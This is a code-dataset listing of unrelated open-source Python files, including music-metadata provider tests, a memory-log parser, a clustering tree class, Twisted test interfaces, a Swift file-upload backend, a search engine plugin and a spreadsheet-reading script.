code stringlengths 2 1.05M | repo_name stringlengths 5 104 | path stringlengths 4 251 | language stringclasses 1 value | license stringclasses 15 values | size int32 2 1.05M |
|---|---|---|---|---|---|
#################################################################
# This file is part of glyr
# + a command-line tool and library to download various sort of music related metadata.
# + Copyright (C) [2011-2012] [Christopher Pahl]
# + Hosted at: https://github.com/sahib/glyr
#
# glyr is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# glyr is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with glyr. If not, see <http://www.gnu.org/licenses/>.
#################################################################
#!/usr/bin/env python
# encoding: utf-8
from tests.__common__ import *
not_found_options = {
'get_type': 'artistphoto',
'artist': 'HorseTheBand',
'album': 'Given, but not used.',
'title': 'Accidentally given'
}
TESTCASES = [{
# {{{
'name': 'bbcmusic',
'data': [{
'options': {
'get_type': 'artistphoto',
'artist': 'The Rolling Stones'
},
'expect': len_greater_0
}, {
'options': not_found_options,
'expect': len_equal_0
}],
}, {
# }}}
# {{{
'name': 'discogs',
'data': [{
'options': {
'get_type': 'artistphoto',
'artist': 'Nirvana'
},
'expect': len_greater_0
}, {
'options': not_found_options,
'expect': len_equal_0
}],
}, {
# }}}
# {{{
'name': 'flickr',
'data': [{
'options': {
'get_type': 'artistphoto',
'artist': 'Die Ärzte'
},
'expect': len_greater_0
}, {
'options': not_found_options,
'expect': len_equal_0
}],
}, {
# }}}
# {{{
'name': 'google',
'data': [{
'options': {
'get_type': 'artistphoto',
'artist': 'DeVildRiVeR'
},
'expect': len_greater_0
}, {
'options': not_found_options,
'expect': len_equal_0
}],
}, {
# }}}
# {{{
'name': 'lastfm',
'data': [{
'options': {
'get_type': 'artistphoto',
'artist': 'Alestorm'
},
'expect': len_greater_0
}, {
'options': not_found_options,
'expect': len_equal_0
}],
}, {
# }}}
# {{{
'name': 'singerpictures',
'data': [{
'options': {
'get_type': 'artistphoto',
'artist': 'Equilibrium'
},
'expect': len_greater_0
}, {
'options': not_found_options,
'expect': len_equal_0
}],
}, {
# }}}
# {{{
'name': 'rhapsody',
'data': [{
'options': {
'get_type': 'artistphoto',
'artist': 'In Flames'
},
'expect': len_greater_0
}, {
'options': not_found_options,
'expect': len_equal_0
}],
}
]
| emillon/glyr-debian | spec/provider/tests/artistphoto.py | Python | gpl-3.0 | 3,340 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2010 TÜBİTAK UEKAE
# Licensed under the GNU General Public License, version 3.
# See the file http://www.gnu.org/copyleft/gpl.txt. | MehmetNuri/ozgurlukicin | beyin2/__init__.py | Python | gpl-3.0 | 188 |
# -*- coding: utf-8 -*-
from google.appengine.ext import vendor
#Para que entienda que las librerías de terceros debe buscarlas en la carpeta lib
vendor.add('lib')
| ButterFlyDevs/StudentsManagementSystem | SMS-Back-End/tdbms/appengine_config.py | Python | gpl-3.0 | 166 |
'''
Parse execution data log stream.
Allows access to selected parts of program memory at the time of recorded events.
'''
# Copyright (c) 2012-2013 Wladimir J. van der Laan
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sub license,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice (including the
# next paragraph) shall be included in all copies or substantial portions
# of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
from __future__ import print_function, division, unicode_literals
import os, sys, struct
from collections import namedtuple
from bisect import bisect_right
from binascii import b2a_hex
LITTLE_ENDIAN = b'<'
BIG_ENDIAN = b'>'
# target architecture description
ENDIAN = LITTLE_ENDIAN
DEBUG = False
RECTYPE_CHAR = b'B' # always 8 bit
MAGIC_CHAR = b'I' # always 32 bit
WORD_CHAR = b'I' # 32 bit
ADDR_CHAR = b'I' # 32/64 bit
SHORT_STRING_SIZE_CHAR = b'B'
# struct specifiers for decoding
RECTYPE_SPEC = struct.Struct(ENDIAN + RECTYPE_CHAR)
HDR_SPEC = struct.Struct(ENDIAN + MAGIC_CHAR + WORD_CHAR)
WORD_SPEC = struct.Struct(ENDIAN + WORD_CHAR)
ADDR_SPEC = struct.Struct(ENDIAN + ADDR_CHAR)
RANGE_SPEC = struct.Struct(ENDIAN + ADDR_CHAR + ADDR_CHAR)
SHORT_STRING_SIZE_SPEC = struct.Struct(ENDIAN + SHORT_STRING_SIZE_CHAR)
FDR_MAGIC = 0x8e1aaa8f
FDR_VERSION = 1
class RTYPE:
'''
FDR record types
'''
RANGE_DATA = 0
RANGE_TEMP_DATA = 1
ADD_UPDATED_RANGE = 2
REMOVE_UPDATED_RANGE = 3
EVENT = 4
COMMENT = 5
def read_spec(f, spec):
return spec.unpack(f.read(spec.size))
def read_short_string(f):
(size,) = read_spec(f, SHORT_STRING_SIZE_SPEC)
return f.read(size)
Event = namedtuple('Event', ['event_type', 'parameters'])
Comment = namedtuple('Comment', ['data'])
Parameter = namedtuple('Parameter', ['name','value'])
class FDRLoader(object):
'''
High-level interface for playing back FDR files.
The object is an iterable that returns event records:
- Event(...) in case of an event
- Comment(...) in case of an comment
Also it can be subscripted to return the current contents of a memory range, like
fdr[ptr:ptr+4] to return a range, or just fdr[ptr] to return one byte.
An IndexError will be raised if either the start or stop is out of range
(or not up to date at the time of this event).
'''
def __init__(self, input_file):
self.f = open(input_file, 'rb')
magic,version = read_spec(self.f, HDR_SPEC)
if magic != FDR_MAGIC:
raise ValueError('Magic value %08x not recognized (should be %08x)' % (magic, FDR_MAGIC))
if version != FDR_VERSION:
raise ValueError('Version %08x not recognized (should be %08x)' % (version, FDR_VERSION))
# Stored memory ranges
self.stored = []
# Active memory ranges
self.updated_ranges = []
# Temporary data
self.temp_ranges = []
# Cached list of starting addresses for bisection
self.updated_ranges_start = []
self.temp_ranges_start = []
# IMPORTANT precondition: all ranges must be non-overlapping
def _flush_temps(self):
self.temp_ranges = []
self.temp_ranges_start = []
def __iter__(self):
f = self.f
while True:
try:
rt, = read_spec(f, RECTYPE_SPEC)
except struct.error: # could not parse entire structure; end of file allowed here
break
if rt == RTYPE.RANGE_DATA:
addr_start,addr_end = read_spec(f, RANGE_SPEC)
data = f.read(addr_end - addr_start)
if DEBUG:
print('RANGE_DATA 0x%08x 0x%08x %s...' % (addr_start, addr_end, b2a_hex(data[0:16])))
# TODO update self.stored
self.update(addr_start, addr_end, data)
elif rt == RTYPE.RANGE_TEMP_DATA:
addr_start,addr_end = read_spec(f, RANGE_SPEC)
data = f.read(addr_end - addr_start)
if DEBUG:
print('RANGE_TEMP_DATA 0x%08x 0x%08x %s...' % (addr_start, addr_end, b2a_hex(data[0:16])))
self.temp_ranges.append((addr_start, addr_end, data))
elif rt == RTYPE.ADD_UPDATED_RANGE:
addr_start,addr_end = read_spec(f, RANGE_SPEC)
if DEBUG:
print('ADD_UPDATED_RANGE 0x%08x 0x%08x' % (addr_start, addr_end))
self.updated_ranges.append((addr_start, addr_end, bytearray(addr_end - addr_start)))
self.updated_ranges.sort()
self.updated_ranges_start = [r[0] for r in self.updated_ranges]
elif rt == RTYPE.REMOVE_UPDATED_RANGE:
addr_start,addr_end = read_spec(f, RANGE_SPEC)
i = bisect_right(self.updated_ranges_start, addr_start) - 1
if DEBUG:
print('REMOVE_UPDATED_RANGE 0x%08x 0x%08x (%i)' % (addr_start, addr_end, i))
assert(self.updated_ranges[i][0] == addr_start and self.updated_ranges[i][1] == addr_end)
del self.updated_ranges[i]
# keep cached list of ranges up-to-date
self.updated_ranges_start = [r[0] for r in self.updated_ranges]
#self.updated_ranges.remove((addr_start, addr_end))
elif rt == RTYPE.EVENT:
event_type = read_short_string(f)
num_parameters, = read_spec(f, WORD_SPEC)
parameters = {}
for i in range(num_parameters):
par = Parameter(
name=read_short_string(f),
value=read_spec(f, ADDR_SPEC)[0])
parameters[par.name] = par
parstr = ' '.join([('%s=0x%x' % par) for par in parameters.itervalues()])
self.temp_ranges.sort()
self.temp_ranges_start = [r[0] for r in self.temp_ranges]
if DEBUG:
print('EVENT %s %s' % (event_type, parstr))
yield Event(event_type, parameters)
self._flush_temps()
elif rt == RTYPE.COMMENT:
size, = read_spec(f, ADDR_SPEC)
comment = f.read(size)
if DEBUG:
print('COMMENT')
yield Comment(comment)
else:
raise ValueError('Unexpected record type %i' % rt)
def __getitem__(self, key):
'''
Get one byte or a range of bytes from this memory map.
'''
# Support slicing as well as single lookups
if isinstance(key, slice):
start = key.start
stop = key.stop
if key.step is not None:
raise KeyError('Extended slices not supported')
else:
start = key
stop = key+1
try:
return self.fetch(self.temp_ranges_start, self.temp_ranges, start, stop)
except IndexError,e:
# need to convert to str explicitly because struct won't work with bytearray
return str(self.fetch(self.updated_ranges_start, self.updated_ranges, start, stop))
def fetch(self, ranges_start, ranges, start, stop):
'''Look up in stored or temp ranges'''
# XXX we don't handle the case of a request spanning multiple consecutive ranges
idx = bisect_right(ranges_start, start) - 1
if idx < 0:
raise IndexError('Start address 0x%x out of range' % (start))
(range_start, range_end, range_data) = ranges[idx]
if stop > range_end:
raise IndexError('End address 0x%x out of range (ends 0x%x)' % (stop, range_end))
return range_data[start-range_start:stop-range_start]
def update(self, start, stop, data):
'''
Update a stored memory range.
'''
idx = bisect_right(self.updated_ranges_start, start) - 1
if idx < 0:
raise IndexError('Start address 0x%x out of range' % (start))
(range_start, range_end, range_data) = self.updated_ranges[idx]
if stop > range_end:
raise IndexError('End address 0x%x out of range (ends 0x%x)' % (stop, range_end))
range_data[start-range_start:stop-range_start] = data
| commshare/etna_viv | tools/etnaviv/parse_fdr.py | Python | gpl-3.0 | 9,109 |
# #START_LICENSE###########################################################
#
#
# This file is part of the Environment for Tree Exploration program
# (ETE). http://etetoolkit.org
#
# ETE is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ETE is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public
# License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ETE. If not, see <http://www.gnu.org/licenses/>.
#
#
# ABOUT THE ETE PACKAGE
# =====================
#
# ETE is distributed under the GPL copyleft license (2008-2015).
#
# If you make use of ETE in published work, please cite:
#
# Jaime Huerta-Cepas, Joaquin Dopazo and Toni Gabaldon.
# ETE: a python Environment for Tree Exploration. Jaime BMC
# Bioinformatics 2010,:24doi:10.1186/1471-2105-11-24
#
# Note that extra references to the specific methods implemented in
# the toolkit may be available in the documentation.
#
# More info at http://etetoolkit.org. Contact: huerta@embl.de
#
#
# #END_LICENSE#############################################################
from __future__ import absolute_import
from __future__ import print_function
from sys import stderr
from . import clustvalidation
from ..coretype.tree import _translate_nodes
from .. import TreeNode, ArrayTable
from .. import numpy
from six.moves import range
__all__ = ["ClusterNode", "ClusterTree"]
class ClusterNode(TreeNode):
""" Creates a new Cluster Tree object, which is a collection
of ClusterNode instances connected in a hierarchical way, and
representing a clustering result.
a newick file or string can be passed as the first argument. An
ArrayTable file or instance can be passed as a second argument.
Examples:
t1 = Tree() # creates an empty tree
t2 = Tree( '(A:1,(B:1,(C:1,D:1):0.5):0.5);' )
t3 = Tree( '/home/user/myNewickFile.txt' )
"""
def _set_forbidden(self, value):
raise ValueError("This attribute can not be manually set.")
def _get_intra(self):
if self._silhouette is None:
self.get_silhouette()
return self._intracluster_dist
def _get_inter(self):
if self._silhouette is None:
self.get_silhouette()
return self._intercluster_dist
def _get_silh(self):
if self._silhouette is None:
self.get_silhouette()
return self._silhouette
def _get_prof(self):
if self._profile is None:
self._calculate_avg_profile()
return self._profile
def _get_std(self):
if self._std_profile is None:
self._calculate_avg_profile()
return self._std_profile
def _set_profile(self, value):
self._profile = value
intracluster_dist = property(fget=_get_intra, fset=_set_forbidden)
intercluster_dist = property(fget=_get_inter, fset=_set_forbidden)
silhouette = property(fget=_get_silh, fset=_set_forbidden)
profile = property(fget=_get_prof, fset=_set_profile)
deviation = property(fget=_get_std, fset=_set_forbidden)
def __init__(self, newick = None, text_array = None, \
fdist=clustvalidation.default_dist):
# Default dist is spearman_dist when scipy module is loaded
# otherwise, it is set to euclidean_dist.
# Initialize basic tree features and loads the newick (if any)
TreeNode.__init__(self, newick)
self._fdist = None
self._silhouette = None
self._intercluster_dist = None
self._intracluster_dist = None
self._profile = None
self._std_profile = None
# Cluster especific features
self.features.add("intercluster_dist")
self.features.add("intracluster_dist")
self.features.add("silhouette")
self.features.add("profile")
self.features.add("deviation")
# Initialize tree with array data
if text_array:
self.link_to_arraytable(text_array)
if newick:
self.set_distance_function(fdist)
def __repr__(self):
return "ClusterTree node (%s)" %hex(self.__hash__())
def set_distance_function(self, fn):
""" Sets the distance function used to calculate cluster
distances and silouette index.
ARGUMENTS:
fn: a pointer to python function acepting two arrays (numpy) as
arguments.
EXAMPLE:
# A simple euclidean distance
my_dist_fn = lambda x,y: abs(x-y)
tree.set_distance_function(my_dist_fn)
"""
for n in self.traverse():
n._fdist = fn
n._silhouette = None
n._intercluster_dist = None
n._intracluster_dist = None
def link_to_arraytable(self, arraytbl):
""" Allows to link a given arraytable object to the tree
structure under this node. Row names in the arraytable object
are expected to match leaf names.
Returns a list of nodes for with profiles could not been found
in arraytable.
"""
# Initialize tree with array data
if type(arraytbl) == ArrayTable:
array = arraytbl
else:
array = ArrayTable(arraytbl)
missing_leaves = []
matrix_values = [i for r in range(len(array.matrix))\
for i in array.matrix[r] if numpy.isfinite(i)]
array._matrix_min = min(matrix_values)
array._matrix_max = max(matrix_values)
for n in self.traverse():
n.arraytable = array
if n.is_leaf() and n.name in array.rowNames:
n._profile = array.get_row_vector(n.name)
elif n.is_leaf():
n._profile = [numpy.nan]*len(array.colNames)
missing_leaves.append(n)
if len(missing_leaves)>0:
print("""[%d] leaf names could not be mapped to the matrix rows.""" %\
len(missing_leaves), file=stderr)
self.arraytable = array
def iter_leaf_profiles(self):
""" Returns an iterator over all the profiles associated to
the leaves under this node."""
for l in self.iter_leaves():
yield l.get_profile()[0]
def get_leaf_profiles(self):
""" Returns the list of all the profiles associated to the
leaves under this node."""
return [l.get_profile()[0] for l in self.iter_leaves()]
def get_silhouette(self, fdist=None):
""" Calculates the node's silhouette value by using a given
distance function. By default, euclidean distance is used. It
also calculates the deviation profile, mean profile, and
inter/intra-cluster distances.
It sets the following features into the analyzed node:
- node.intracluster
- node.intercluster
- node.silhouete
intracluster distances a(i) are calculated as the Centroid
Diameter
intercluster distances b(i) are calculated as the Centroid linkage distance
** Rousseeuw, P.J. (1987) Silhouettes: A graphical aid to the
interpretation and validation of cluster analysis.
J. Comput. Appl. Math., 20, 53-65.
"""
if fdist is None:
fdist = self._fdist
# Updates internal values
self._silhouette, self._intracluster_dist, self._intercluster_dist = \
clustvalidation.get_silhouette_width(fdist, self)
# And returns them
return self._silhouette, self._intracluster_dist, self._intercluster_dist
def get_dunn(self, clusters, fdist=None):
""" Calculates the Dunn index for the given set of descendant
nodes.
"""
if fdist is None:
fdist = self._fdist
nodes = _translate_nodes(self, *clusters)
return clustvalidation.get_dunn_index(fdist, *nodes)
def _calculate_avg_profile(self):
""" This internal function updates the mean profile
associated to an internal node. """
# Updates internal values
self._profile, self._std_profile = clustvalidation.get_avg_profile(self)
# cosmetic alias
#: .. currentmodule:: ete3
#
ClusterTree = ClusterNode
| Unode/ete | ete3/clustering/clustertree.py | Python | gpl-3.0 | 8,555 |
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Interfaces for Trial.
Maintainer: Jonathan Lange
"""
from __future__ import division, absolute_import
import zope.interface as zi
from zope.interface import Attribute
class ITestCase(zi.Interface):
"""
The interface that a test case must implement in order to be used in Trial.
"""
failureException = zi.Attribute(
"The exception class that is raised by failed assertions")
def __call__(result):
"""
Run the test. Should always do exactly the same thing as run().
"""
def countTestCases():
"""
Return the number of tests in this test case. Usually 1.
"""
def id():
"""
Return a unique identifier for the test, usually the fully-qualified
Python name.
"""
def run(result):
"""
Run the test, storing the results in C{result}.
@param result: A L{TestResult}.
"""
def shortDescription():
"""
Return a short description of the test.
"""
class IReporter(zi.Interface):
"""
I report results from a run of a test suite.
"""
stream = zi.Attribute(
"Deprecated in Twisted 8.0. "
"The io-stream that this reporter will write to")
tbformat = zi.Attribute("Either 'default', 'brief', or 'verbose'")
args = zi.Attribute(
"Additional string argument passed from the command line")
shouldStop = zi.Attribute(
"""
A boolean indicating that this reporter would like the test run to stop.
""")
separator = Attribute(
"Deprecated in Twisted 8.0. "
"A value which will occasionally be passed to the L{write} method.")
testsRun = Attribute(
"""
The number of tests that seem to have been run according to this
reporter.
""")
def startTest(method):
"""
Report the beginning of a run of a single test method.
@param method: an object that is adaptable to ITestMethod
"""
def stopTest(method):
"""
Report the status of a single test method
@param method: an object that is adaptable to ITestMethod
"""
def startSuite(name):
"""
Deprecated in Twisted 8.0.
Suites which wish to appear in reporter output should call this
before running their tests.
"""
def endSuite(name):
"""
Deprecated in Twisted 8.0.
Called at the end of a suite, if and only if that suite has called
C{startSuite}.
"""
def cleanupErrors(errs):
"""
Deprecated in Twisted 8.0.
Called when the reactor has been left in a 'dirty' state
@param errs: a list of L{twisted.python.failure.Failure}s
"""
def upDownError(userMeth, warn=True, printStatus=True):
"""
Deprecated in Twisted 8.0.
Called when an error occurs in a setUp* or tearDown* method
@param warn: indicates whether or not the reporter should emit a
warning about the error
@type warn: Boolean
@param printStatus: indicates whether or not the reporter should
print the name of the method and the status
message appropriate for the type of error
@type printStatus: Boolean
"""
def addSuccess(test):
"""
Record that test passed.
"""
def addError(test, error):
"""
Record that a test has raised an unexpected exception.
@param test: The test that has raised an error.
@param error: The error that the test raised. It will either be a
three-tuple in the style of C{sys.exc_info()} or a
L{Failure<twisted.python.failure.Failure>} object.
"""
def addFailure(test, failure):
"""
Record that a test has failed with the given failure.
@param test: The test that has failed.
@param failure: The failure that the test failed with. It will
either be a three-tuple in the style of C{sys.exc_info()}
or a L{Failure<twisted.python.failure.Failure>} object.
"""
def addExpectedFailure(test, failure, todo=None):
"""
Record that the given test failed, and was expected to do so.
In Twisted 15.5 and prior, C{todo} was a mandatory parameter.
@type test: L{pyunit.TestCase}
@param test: The test which this is about.
@type error: L{failure.Failure}
@param error: The error which this test failed with.
@type todo: L{unittest.Todo}
@param todo: The reason for the test's TODO status. If C{None}, a
generic reason is used.
"""
def addUnexpectedSuccess(test, todo=None):
"""
Record that the given test failed, and was expected to do so.
In Twisted 15.5 and prior, C{todo} was a mandatory parameter.
@type test: L{pyunit.TestCase}
@param test: The test which this is about.
@type todo: L{unittest.Todo}
@param todo: The reason for the test's TODO status. If C{None}, a
generic reason is used.
"""
def addSkip(test, reason):
"""
Record that a test has been skipped for the given reason.
@param test: The test that has been skipped.
@param reason: An object that the test case has specified as the reason
for skipping the test.
"""
def printSummary():
"""
Deprecated in Twisted 8.0, use L{done} instead.
Present a summary of the test results.
"""
def printErrors():
"""
Deprecated in Twisted 8.0, use L{done} instead.
Present the errors that have occurred during the test run. This method
will be called after all tests have been run.
"""
def write(string):
"""
Deprecated in Twisted 8.0, use L{done} instead.
Display a string to the user, without appending a new line.
"""
def writeln(string):
"""
Deprecated in Twisted 8.0, use L{done} instead.
Display a string to the user, appending a new line.
"""
def wasSuccessful():
"""
Return a boolean indicating whether all test results that were reported
to this reporter were successful or not.
"""
def done():
"""
Called when the test run is complete.
This gives the result object an opportunity to display a summary of
information to the user. Once you have called C{done} on an
L{IReporter} object, you should assume that the L{IReporter} object is
no longer usable.
"""
| Architektor/PySnip | venv/lib/python2.7/site-packages/twisted/trial/itrial.py | Python | gpl-3.0 | 6,853 |
'''
Add in /edx/app/edxapp/edx-platform/lms/envs/aws.py:
ORA2_SWIFT_URL = AUTH_TOKENS["ORA2_SWIFT_URL"]
ORA2_SWIFT_KEY = AUTH_TOKENS["ORA2_SWIFT_KEY"]
Add in /edx/app/edxapp/lms.auth.json
"ORA2_SWIFT_URL": "https://EXAMPLE",
"ORA2_SWIFT_KEY": "EXAMPLE",
ORA2_SWIFT_KEY should correspond to Meta Temp-Url-Key configure in swift. Run
'swift stat -v' to get it.
'''
import logging
import urlparse
import requests
import swiftclient
from django.conf import settings
from ..exceptions import FileUploadInternalError
from .base import BaseBackend
logger = logging.getLogger("openassessment.fileupload.api")
# prefix paths with current version, in case we need to roll it at some point
SWIFT_BACKEND_VERSION = 1
class Backend(BaseBackend):
"""
Upload openassessment student files to swift
"""
def get_upload_url(self, key, content_type):
bucket_name, key_name = self._retrieve_parameters(key)
key, url = get_settings()
try:
temp_url = swiftclient.utils.generate_temp_url(
path='/v%s%s/%s/%s' % (SWIFT_BACKEND_VERSION, url.path, bucket_name, key_name),
key=key,
method='PUT',
seconds=self.UPLOAD_URL_TIMEOUT
)
return '%s://%s%s' % (url.scheme, url.netloc, temp_url)
except Exception as ex:
logger.exception(
u"An internal exception occurred while generating an upload URL."
)
raise FileUploadInternalError(ex)
def get_download_url(self, key):
bucket_name, key_name = self._retrieve_parameters(key)
key, url = get_settings()
try:
temp_url = swiftclient.utils.generate_temp_url(
path='/v%s%s/%s/%s' % (SWIFT_BACKEND_VERSION, url.path, bucket_name, key_name),
key=key,
method='GET',
seconds=self.DOWNLOAD_URL_TIMEOUT
)
download_url = '%s://%s%s' % (url.scheme, url.netloc, temp_url)
response = requests.get(download_url)
return download_url if response.status_code == 200 else ""
except Exception as ex:
logger.exception(
u"An internal exception occurred while generating a download URL."
)
raise FileUploadInternalError(ex)
def remove_file(self, key):
bucket_name, key_name = self._retrieve_parameters(key)
key, url = get_settings()
try:
temp_url = swiftclient.utils.generate_temp_url(
path='%s/%s/%s' % (url.path, bucket_name, key_name),
key=key,
method='DELETE',
seconds=self.DOWNLOAD_URL_TIMEOUT)
remove_url = '%s://%s%s' % (url.scheme, url.netloc, temp_url)
response = requests.delete(remove_url)
return response.status_code == 204
except Exception as ex:
logger.exception(
u"An internal exception occurred while removing object on swift storage."
)
raise FileUploadInternalError(ex)
def get_settings():
"""
Returns the swift key and a parsed url.
Both are generated from django settings.
"""
url = getattr(settings, 'ORA2_SWIFT_URL', None)
key = getattr(settings, 'ORA2_SWIFT_KEY', None)
url = urlparse.urlparse(url)
return key, url
| Stanford-Online/edx-ora2 | openassessment/fileupload/backends/swift.py | Python | agpl-3.0 | 3,388 |
"""
Frinkiac (Images)
@website https://www.frinkiac.com
@provide-api no
@using-api no
@results JSON
@stable no
@parse url, title, img_src
"""
from json import loads
from urllib import urlencode
categories = ['images']
BASE = 'https://frinkiac.com/'
SEARCH_URL = '{base}api/search?{query}'
RESULT_URL = '{base}?{query}'
THUMB_URL = '{base}img/{episode}/{timestamp}/medium.jpg'
IMAGE_URL = '{base}img/{episode}/{timestamp}.jpg'
def request(query, params):
params['url'] = SEARCH_URL.format(base=BASE, query=urlencode({'q': query}))
return params
def response(resp):
results = []
response_data = loads(resp.text)
for result in response_data:
episode = result['Episode']
timestamp = result['Timestamp']
results.append({'template': 'images.html',
'url': RESULT_URL.format(base=BASE,
query=urlencode({'p': 'caption', 'e': episode, 't': timestamp})),
'title': episode,
'content': '',
'thumbnail_src': THUMB_URL.format(base=BASE, episode=episode, timestamp=timestamp),
'img_src': IMAGE_URL.format(base=BASE, episode=episode, timestamp=timestamp)})
return results
| matejc/searx | searx/engines/frinkiac.py | Python | agpl-3.0 | 1,303 |
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Original Module by SIESA (<http://www.siesacr.com>)
# Refactored by CLEARCORP S.A. (<http://clearcorp.co.cr>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# license, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
##############################################################################
from openerp.osv import osv, fields
class Payment(osv.Model):
"""Commissions Payroll Payment"""
_name = 'hr.payroll.pay.commission.payment'
_description = __doc__
def _check_amount_paid(self, cr, uid, ids, context=None):
for payment in self.browse(cr, uid, ids, context=context):
if payment.amount_paid <= 0.0:
return False
return True
_columns = {
'commission_id': fields.many2one('sale.commission.commission', string='Commission'),
'invoice_id': fields.related('commission_id', 'invoice_id', type='many2one',
obj='account.invoice', string='Invoice', readonly=True),
'input_id': fields.many2one('hr.payslip.input', ondelete='restrict', string='Input'),
'slip_id':fields.related('input_id', 'payslip_id', type='many2one',
string='Payslip', obj='hr.payslip', readonly=True, store=True),
'amount_paid': fields.float('Amount Paid', digits=(16,2)),
}
_constraints = [(_check_amount_paid, 'Value must be greater or equal than 0.', ['amount_paid'])] | sysadminmatmoz/odoo-clearcorp | TODO-8.0/hr_payroll_pay_commission/hr_payroll_pay_commission.py | Python | agpl-3.0 | 2,121 |
# Copyright (c) 2011, 2012 Free Software Foundation
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# This project incorporates work covered by the following copyright and permission notice:
# Copyright (c) 2009, Julien Fache
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the author nor the names of other
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
# OF THE POSSIBILITY OF SUCH DAMAGE.
# Copyright (c) 2011, 2012 Free Software Foundation
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Urls for Objectapp forms"""
from django.conf.urls.defaults import url
from django.conf.urls.defaults import patterns
urlpatterns = patterns('objectapp.views.add',
url(r'^gbobject/$', 'addgbobject',
name='objectapp_add_gbobject'),
url(r'^process/$', 'addprocess',
name='objectapp_add_gbobject'),
url(r'^system/$', 'addsystem',
name='objectapp_add_system'),
)
| gnowgi/gnowsys-studio | objectapp/urls/add.py | Python | agpl-3.0 | 3,741 |
"""Deprecated import support. Auto-generated by import_shims/generate_shims.sh."""
# pylint: disable=redefined-builtin,wrong-import-position,wildcard-import,useless-suppression,line-too-long
from import_shims.warn import warn_deprecated_import
warn_deprecated_import('discussion.rest_api.tests.test_pagination', 'lms.djangoapps.discussion.rest_api.tests.test_pagination')
from lms.djangoapps.discussion.rest_api.tests.test_pagination import *
| eduNEXT/edunext-platform | import_shims/lms/discussion/rest_api/tests/test_pagination.py | Python | agpl-3.0 | 446 |
#!/usr/bin/python
import urllib2
import csv
import xml.sax
uri = "http://spreadsheets.google.com/tq?tqx=out:csv&key=0AjWA_TWMI4t_dFI5MWRWZkRWbFJ6MVhHQzVmVndrZnc&hl=en_GB"
f = urllib2.urlopen(uri)
csv_data = f.read()
lines = csv_data.split("\n")
